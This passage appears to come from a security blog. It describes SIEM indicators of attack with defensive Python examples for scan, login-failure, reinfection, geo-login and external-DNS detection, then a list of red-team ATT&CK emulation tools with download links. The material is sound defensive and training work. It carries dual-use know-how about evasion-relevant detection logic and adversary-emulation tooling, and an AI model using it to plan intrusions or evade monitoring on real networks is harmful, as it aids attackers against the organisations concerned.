Network scans by internal hosts communicating with multiple hosts in a short time frame could reveal an attacker moving laterally within the network. This incident is detected from perimeter network defenses such as the firewall and IPS. You must choose the zone/interface filter from “Internal” to “Internal” only; in future, you should focus on “Internal” to “DMZ” too. It may be an insider threat or compromised hosts that need more information about your networks (reconnaissance).


Example of a network scans report filtered from the “Internal” zone to the “Internal” zone.

6) Multiple alarm events from a single host

Multiple alarm events from a single host, or duplicate events across multiple machines in the same subnet over a 24-hour period, such as repeated authentication failures. THIS IS A COMMON USE CASE.


Example dashboard monitoring “User Login Failures” from single hosts.

Note: login-failure events from e-mail applications on mobile phones can generate more than 500 events/minute. I found this case when a user account's password had expired but the user had not changed the password on their devices.

7) System is reinfected with malware

After the infected host is cleaned, the system is reinfected with malware within 5-10 minutes; repeated reinfections signal the presence of a rootkit or a persistent compromise. This incident may be detected from Endpoint Security Protection or Anti-Virus events.


This is an example malware dashboard.

Detection: you must create at least 3 rules on the SIEM, as follows:

  1. The rule alerts when it finds an infected host, then adds it to the Current Infected Hosts List and the Historical Infected Hosts List (stored for at least 1 week).
  2. The rule alerts when malware is cleaned from an infected host, then removes it from the Current Infected Hosts List.
  3. The rule alerts when it finds an infected host that is in the Historical Infected Hosts List within the specified time range. THAT SYSTEM SHOULD BE SCANNED/INVESTIGATED FOR MALWARE AGAIN!!!
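
The three rules are stateful: the detection depends on what the two lists contained when the new event arrived. The block below is an added example written for this page, not a rule export from any SIEM product; it keeps the two lists as dictionaries, applies the three rules in order, and raises the reinfection alert only for a host that was cleaned and then reported infected again inside the window. The event tuples, the 10-minute reinfection window and the one-week retention are constructed for the example.

```python
"""Stateful version of the three reinfection rules above, as an added example.

The event format (timestamp, host, action) and the windows are constructed; a real
SIEM would hold the two lists as active lists, which the dicts below stand in for.
"""
from datetime import datetime, timedelta


class ReinfectionTracker:
    def __init__(self, history_retention=timedelta(days=7), reinfect_window=timedelta(minutes=10)):
        self.current = {}       # Current Infected Hosts List: host -> time of the open infection
        self.historical = {}    # Historical Infected Hosts List: host -> time last cleaned/infected
        self.retention = history_retention
        self.window = reinfect_window
        self.alerts = []

    def _expire_history(self, now):
        # Rule 1 keeps history for at least a week; anything older drops off the list.
        for host, seen in list(self.historical.items()):
            if now - seen > self.retention:
                del self.historical[host]

    def on_event(self, ts, host, action):
        self._expire_history(ts)
        if action == "infected":
            # Rule 3: a host that was cleaned recently and now shows up infected again.
            last_clean = self.historical.get(host)
            if host not in self.current and last_clean is not None and ts - last_clean <= self.window:
                self.alerts.append(("REINFECTED", host, ts))
            # Rule 1: record the infection in both lists.
            self.current[host] = ts
            self.historical[host] = ts
        elif action == "cleaned":
            # Rule 2: leave the current list; the historical entry keeps the clean time.
            self.current.pop(host, None)
            self.historical[host] = ts
        else:
            raise ValueError(f"unknown action {action!r}")

    def process(self, events):
        """events: iterable of (iso_timestamp, host, action); processed in time order."""
        for ts_str, host, action in sorted(events):
            self.on_event(datetime.fromisoformat(ts_str), host, action)
        return list(self.alerts)


# Constructed sample events (AV/EDR outcomes normalised to "infected" / "cleaned").
SAMPLE_EVENTS = [
    # hostA: cleaned, then infected again 7 minutes later -> REINFECTED
    ("2024-03-01T08:00:00", "hostA", "infected"),
    ("2024-03-01T08:05:00", "hostA", "cleaned"),
    ("2024-03-01T08:12:00", "hostA", "infected"),
    # hostB: infected again two hours after cleaning -> outside the window, no alert
    ("2024-03-01T08:00:00", "hostB", "infected"),
    ("2024-03-01T08:03:00", "hostB", "cleaned"),
    ("2024-03-01T10:00:00", "hostB", "infected"),
    # hostC: reappears nine days later -> its history has expired, no alert
    ("2024-03-01T08:00:00", "hostC", "infected"),
    ("2024-03-01T08:01:00", "hostC", "cleaned"),
    ("2024-03-10T08:00:00", "hostC", "infected"),
]

if __name__ == "__main__":
    tracker = ReinfectionTracker()
    for level, host, when in tracker.process(SAMPLE_EVENTS):
        print(level, host, when.isoformat())
    print("currently infected:", sorted(tracker.current))
```

Whether hostB's second infection should also alert is a tuning decision: widening `reinfect_window` toward the one-week retention turns rule 3 into "any repeat within the history period", which catches slow persistence at the cost of more noise.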

8. Multiple Login from different regions

A user account trying to log in to multiple resources within a few minutes from or to different regions. This is a sign that the user's credentials have been stolen or that the user is up to mischief.


An example of the correlation rule. Ideal solutions may vary based on your network conditions and security policy.

This rule detects events in the “Login” normalization category with an Event Outcome equal to “Success” and multiple Source Geo-locations within a specified time range; events are grouped by Source User.

9. Internal hosts use much SMTP

E-mail protocols such as SMTP (Simple Mail Transfer Protocol), POP3 and IMAP4 should be monitored. Some malware uses these ports to send information to a suspicious or hacker's server.


Example of an infected client using SMTP (TCP/25).

10. Internal hosts may query to External/Internal DNS

Many organizations have internal DNS servers for caching records and serving DNS to internal hosts, and the DHCP configuration defines the internal DNS server as the primary DNS server. If you find that some internal hosts query an external DNS server such as Google DNS, you should scan those clients for malware.


Some incidents are found when an internal host sends many requests to the internal DNS server (> 1,000 events/hour).
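
IoAs 5, 6, 8 and 10 above share one detection pattern: normalise the events, group them by a key (source host or user), and count something inside a sliding time window. The following is an added example written for this page, not a rule set from any SIEM, showing that pattern in Python over a constructed event log: one internal host sweeping 25 internal addresses, one host accumulating login failures, one user succeeding from two regions four minutes apart, and one host resolving through an outside DNS server. The pipe-delimited event format, the internal network ranges, the approved resolver address and all thresholds are constructed assumptions to be replaced with a site's own values.

```python
"""Windowed correlation over normalized events, the grouping pattern behind IoAs 5, 6, 8 and 10.

Added example, not from any SIEM product. The pipe-delimited event format, the
network ranges, the approved resolver and the thresholds are all constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]
APPROVED_RESOLVERS = {"10.0.0.53"}   # constructed: the internal DNS server handed out by DHCP


def is_internal(ip: str) -> bool:
    return any(ip_address(ip) in net for net in INTERNAL_NETS)


def parse_event(line: str) -> dict:
    """Constructed normalized format: ts|category|outcome|src_ip|dst_ip|dst_port|user|geo."""
    ts, category, outcome, src, dst, port, user, geo = line.split("|")
    return {"ts": datetime.fromisoformat(ts), "category": category, "outcome": outcome,
            "src": src, "dst": dst, "port": int(port) if port else None, "user": user, "geo": geo}


def sliding_windows(events, key, window):
    """Yield (key, bucket) for every event in time order, where bucket holds the
    events with the same key that fall within `window` before the current one."""
    buckets = defaultdict(list)
    for event in sorted(events, key=lambda e: e["ts"]):
        bucket = buckets[key(event)]
        bucket.append(event)
        while event["ts"] - bucket[0]["ts"] > window:
            bucket.pop(0)   # age out events that left the window
        yield key(event), bucket


def rule_login_failures(events, threshold=5, window=timedelta(hours=24)):
    """IoA 6: repeated authentication failures from a single source host."""
    failures = [e for e in events if e["category"] == "Login" and e["outcome"] == "Failure"]
    return {src for src, bucket in sliding_windows(failures, lambda e: e["src"], window)
            if len(bucket) >= threshold}


def rule_multi_geo_logins(events, window=timedelta(minutes=10)):
    """IoA 8: successful logins for one user from more than one geo-location in the window."""
    successes = [e for e in events if e["category"] == "Login" and e["outcome"] == "Success"]
    hits = set()
    for user, bucket in sliding_windows(successes, lambda e: e["user"], window):
        geos = {e["geo"] for e in bucket}
        if len(geos) > 1:
            hits.add((user, tuple(sorted(geos))))
    return hits


def rule_internal_scan(events, threshold=20, window=timedelta(minutes=5)):
    """IoA 5: one internal host reaching many distinct internal hosts in a short time."""
    internal = [e for e in events if e["category"] == "Connection"
                and is_internal(e["src"]) and is_internal(e["dst"])]
    return {src for src, bucket in sliding_windows(internal, lambda e: e["src"], window)
            if len({e["dst"] for e in bucket}) >= threshold}


def rule_external_dns(events):
    """IoA 10: internal hosts resolving through anything other than the approved resolvers."""
    return {(e["src"], e["dst"]) for e in events
            if e["category"] == "DNS" and is_internal(e["src"]) and e["dst"] not in APPROVED_RESOLVERS}


def run_all(lines):
    events = [parse_event(line) for line in lines]
    return {"internal_scan": rule_internal_scan(events),
            "login_failures": rule_login_failures(events),
            "multi_geo_logins": rule_multi_geo_logins(events),
            "external_dns": rule_external_dns(events)}


def _sample_log():
    """Constructed events: one sweep, one failure burst, one impossible travel, one DNS bypass."""
    lines = [f"2024-01-15T09:00:{i:02d}|Connection|Success|10.0.0.7|10.0.1.{i + 1}|445||"
             for i in range(25)]                                   # IoA 5: 25 hosts in 25 s
    lines += [f"2024-01-15T09:{i * 10:02d}:00|Login|Failure|10.0.0.9|10.0.0.2||svc_backup|TH"
              for i in range(6)]                                   # IoA 6: 6 failures in an hour
    lines += ["2024-01-15T09:00:00|Login|Success|203.0.113.5|10.0.0.2||jdoe|TH",
              "2024-01-15T09:04:00|Login|Success|198.51.100.7|10.0.0.2||jdoe|DE",   # IoA 8
              "2024-01-15T09:01:00|Login|Success|10.0.0.31|10.0.0.2||asmith|TH",
              "2024-01-15T09:30:00|Login|Success|10.0.0.31|10.0.0.2||asmith|TH"]   # consistent
    lines += ["2024-01-15T09:02:00|DNS|Success|10.0.0.7|10.0.0.53|53||",            # approved
              "2024-01-15T09:02:30|DNS|Success|10.0.0.12|198.51.100.53|53||"]       # IoA 10
    return lines


SAMPLE_LOG = _sample_log()

if __name__ == "__main__":
    for name, hits in run_all(SAMPLE_LOG).items():
        print(f"{name}: {sorted(hits)}")
```

The note under IoA 6 about mobile mail clients is the reason `rule_login_failures` groups by source host rather than by user: a single device retrying an expired password trips the threshold on its own and is easy to tune out by host, while an attacker spraying one account from many hosts still shows up when the same window is grouped by user.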

Action and Adaptation

Once the IoA is created, people and processes can act while the rich intelligence is distributed. Directly, alerts and thresholds can guide enforcement actions such as quarantine. In near real time, new findings can factor into policy adjustments, authentication requirements, and human response workflows. Within hours and days, findings can influence risk scores, organizational policies, and end-user education. Over longer timelines—weeks and months—organizations can trend and surface anomalies, predict future attacks and adjust sensitivities.

Reference: http://www.mcafee.com/cf/resources/reports/rp-when-minutes-count.pdf

Original Source & Credit:  Sittikorn Sangrattanapitak, CISSP


Original Post: https://gbhackers.com/soc-indicator/

Red Team and Open-Source Mitre’s ATT&CK Framework Test Tools


One way to learn how to better defend your enterprise is to train a red team to simulate attacks. The MITRE ATT&CK framework can be a very useful collection of threat tactics and techniques for such a team. The framework classifies and describes a wide range of attacks. To make it even more effective, various commercial and open-source testing tools have been built to complement its schemas.

Adversarial Tactics, Techniques & Common Knowledge

MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target. ATT&CK is useful for understanding security risk against known adversary behavior, for planning security improvements, and verifying defenses work as expected.


Video: Post-Exploit Threat Modeling with ATT&CK




Red Team Automation (RTA)

RTA provides a framework of scripts designed to allow blue teams to test their detection capabilities against malicious tradecraft, modeled after MITRE ATT&CK.

RTA is composed of Python scripts that generate evidence of over 50 different ATT&CK techniques, as well as a compiled binary application that performs activities such as file timestomping, process injection, and beacon simulation as needed.

Where possible, RTA attempts to perform the actual malicious activity described. In other cases, the RTAs will emulate all or parts of the activity. For example, some lateral movement will by default target the local host (though parameters typically allow for multi-host testing). In other cases, executables such as cmd.exe or python.exe will be renamed to make it appear as if a Windows binary is doing non-standard activities.

Introduction: https://www.endgame.com/blog/technical-blog/introducing-endgame-red-team-automation

Download: https://github.com/endgameinc/RTA


CALDERA is an automated adversary emulation system that performs post-compromise adversarial behavior within Windows Enterprise networks. It generates plans during operation using a planning system and a pre-configured adversary model based on the Adversarial Tactics, Techniques & Common Knowledge (ATT&CK™) project. These features allow CALDERA to dynamically operate over a set of systems using variable behavior, which better represents how human adversaries perform operations than systems that follow prescribed sequences of actions.

Introduction: https://www.mitre.org/research/technology-transfer/open-source-software/caldera

Download: https://github.com/mitre/caldera

Atomic Red Team

Small and highly portable detection tests mapped to the Mitre ATT&CK Framework.

Our Atomic Red Team tests are small, highly portable detection tests mapped to the MITRE ATT&CK Framework. Each test is designed to map back to a particular tactic. We hope that this gives defenders a highly actionable way to immediately start testing their defenses against a broad spectrum of attacks.

Introduction: https://www.redcanary.com/blog/atomic-red-team-testing/

Download: https://github.com/redcanaryco/atomic-red-team


Metta is an information security preparedness tool.

This project uses Redis/Celery, Python, and Vagrant with VirtualBox to do adversarial simulation. This allows you to test (mostly) your host-based instrumentation, but may also allow you to test any network-based detection and controls depending on how you set up your Vagrant boxes.

Introduction: https://medium.com/uber-security-privacy/uber-security-metta-open-source-a8a49613b4a

Download: https://github.com/uber-common/metta



